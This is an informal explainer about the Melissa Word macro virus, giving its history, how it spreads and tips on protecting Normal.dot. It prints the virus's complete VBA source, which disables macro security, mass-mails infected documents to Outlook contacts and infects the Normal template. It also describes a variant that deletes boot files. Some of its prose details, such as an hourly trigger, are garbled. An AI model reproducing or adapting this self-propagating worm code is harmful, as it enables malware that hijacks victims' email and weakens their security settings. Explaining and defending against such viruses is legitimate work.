Melissa and other Macro Viruses Explained----

Melissa, the deadliest Macro Virus ever to hit the net is dreaded by people all
over the world. I am going to shed some light on
how it works and how to protect yourself from Macro Viruses and lots more.

Well let me start by giving a brief History about Melissa's origin. Well it is
believed that Melissa originated first in Western
Europe on the alt.sex newsgroup. It had taken the web by storm and is somewhat
quite deadly.

So How does it Work?

Melissa is a Word Macro Virus. That is, it was written in the Visual Basic
Editor which comes alongwith Office97 or Office2K

***************

NewBie Note: Run Word or Excel and press Alt + F11 to launch the Visual Basic
Editor.

***************

The core of Microsoft's Office suite is a Visual Basic Engine which runs behind
the scenes and can be used for advanced Visual
Basic coding.
So the following code was written in this Visual Basic editor.

/--------The Melissa Word Macro Virus Code: Start--------\

Private Sub Document_Open()

On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <>
""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") =
1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
 Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice

Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x=1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x=x+1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)

Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
 ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then

If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then

Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then

Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =

False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

'WORD/Melissa written by Kwyjibo

'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus

triple-word-score, plus fifty points for using all my
letters. Game's over. I'm outta here."
End Sub

\--------The Melissa Word Macro Virus Code: End--------/

Melissa infects Word97 and Word2000 documents. If you receive an email with a
document attached which is infected with the
Melissa Word Macro then your computer is not infected by just reading the email,
Melissa is on your machine ony if you open the
infected attached Word Document. Once Melissa is on your machine, the macro
virus will attempt to start MicroSoft Outlook to send
copies of the infected document to 50 people in Outlook's Address Book as an
attachment. The message sent by this Macro Virus to
50 people from the address book as as follows:

The email Subject reads:

Important Message From [username]

Here the Username is the Name that you have set as your Nickname or the name
which Outlook puts to all Outgoing mail.

The Email Body reads:

Here is the document you asked for….don't show anyone else. ;-)

And this email has the infected document as an attachment. The infected document
reportedly contains some passwords to X rated
sites.

The Virus is restricted to MS Outlook and MS Exchange and does not trigger such
mass mailings on other Mail Platforms like Lotus
Notes. What's worse is that the Virus turns off Office's Macro Protection
leaving the user exposed to future Viruses. It also
makes the Tools > Macro command inaccessable, preventing you from checking any
Macro that may be present in a Document or a
Template. It also switches off som eof Office97 and Office2K's advanced features
like Macro Virus Protection, the prompt to SAVE
NORMAL template, and the Confirm Conversion at Open. With these options
disabled, MS Word 97 does not warn or prompt while saving
the NORMAL.DOT or while opening a document with macros in it.

When a user opens or closes an infected document, the virus first checks to see
if it has done this mass e-mailing once before,
by checking the following registry key:
"HKEY_CURRENT_USER\Software\Microsoft\Office\" as "Melissa?" value.
If this key has a value "Melissa?" set to the value "...by Kwyjibo", then the
mass e-mailing has been done previously from the
current machine. The virus will not attempt to do the mass mailing a second
time, if it has already been done from this
machine.If the Virus does not find the registry key it will carry out the Mass
Mailings.

The Macro Virus will send out mass mailings only once from an infected machine,
but it's effects do not end here, it has a
secondry consequence which triggers once every hour. Let me make it more clear,

When the time of the day matches the date(for example: at 2.21 pm on May 21st
the Virus is triggered.) the Virus pops the
following phrase on the screen:

Twenty-two points, plus triple-word-score, plus fifty points for using all my
letters. Game's over. I'm outta here.

Say a particular document is opened or saved at this particular time then the
above text is inserted in the Document.
Although this aspect of the Melissa Virus is harmless, it might be used in the
future by some malicious Virus coder to write a
deadlier Variant of the Melissa.

If the Virus attacks via Word2000 it will modify the Registry setting such the
security level is set to the minimum and the Macro
Security Feature is turned off.

W97M.Melissa.IJ

Have you ever got an email with the subject 'Pictures' and the line 'What's Up'
in the body of the message and a word document as
an attachment, then it is likely that your computer is infected by the
W97M.Melissa.IJ (Geni) Macro Virus. The virus tries to use
Microsoft Outlook to email a copy of the infected document to upto 4 random
addresses from the address book. It can also delete
system files like io.sys and command.com making it impossible to boot up your
machine. Just for your info, the person who coded
this virus was traced by the authorites with the help of AOL within a week of
it's first appearance. Later he was bailed out for
$100,000.

How do I protect myself from these Macro Viruses?

Well If you are already infected then the best thing to do would be to update
your Antiviral Software. IF you are not already
infected then there are many ways to protect yourself from further protection.

1. Change the attributes of the File Normal.dot to read only. But this foolproof
method does not allow you to make modifications
to this file if you want to.
2. The Other thing you could do is Password Protect the Normal.dot file, this
will ask you for a password evry time you want to
modify normal.dot thus allowing to make changes to this file whenever you want
to.
3. Well there is yet another way out. Now almost all Word97 Macro Viruses are
Visual Basic Applications or VBA code you can
protect yourself from them by locking then out. Just start the Visual Basic
Editor by Pressing ALT+ F11 and select Normal in the
Project Explorer. Now select Normal Properties from the Tools menu. Next choose
Protection tab in the Project Properties dialog
box and enter a password to view project properties option. This locks out the
Macro viruses but allows you to modify the
Normal.dot file.